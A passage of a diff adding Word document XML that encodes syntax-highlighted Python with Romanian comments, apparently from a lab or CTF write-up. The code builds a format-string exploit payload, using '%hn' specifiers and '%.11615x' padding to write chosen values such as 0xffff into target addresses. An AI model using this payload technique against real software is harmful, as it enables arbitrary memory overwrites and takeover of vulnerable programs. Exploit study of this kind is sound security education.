+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>encode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>'latin-1'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#cel de-al 63-specificator va avea un padding care sa acopere cele 53350 ramase</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt_64</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)] = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt_64</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt_64</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#se recalculeaza valoarea de sfarsit a sirului</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>###################</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#se pune primul %hn</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>###################</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt_hn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"%hn"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>encode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>'latin-1'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#se pune primul speficator de tipu %hn care va copia in prima adresa valoarea 0xffff</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> +</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt_hn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)] = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt_hn</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt_hn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>##########################################</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#se pune paddingul necesare pentru afisarea caracterelor 0xffff-0xd2a0 = 2D5F =&gt; 11615 de caractere trebuie afisate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>ftm_between</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>%.11615x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>encode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>'latin-1'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
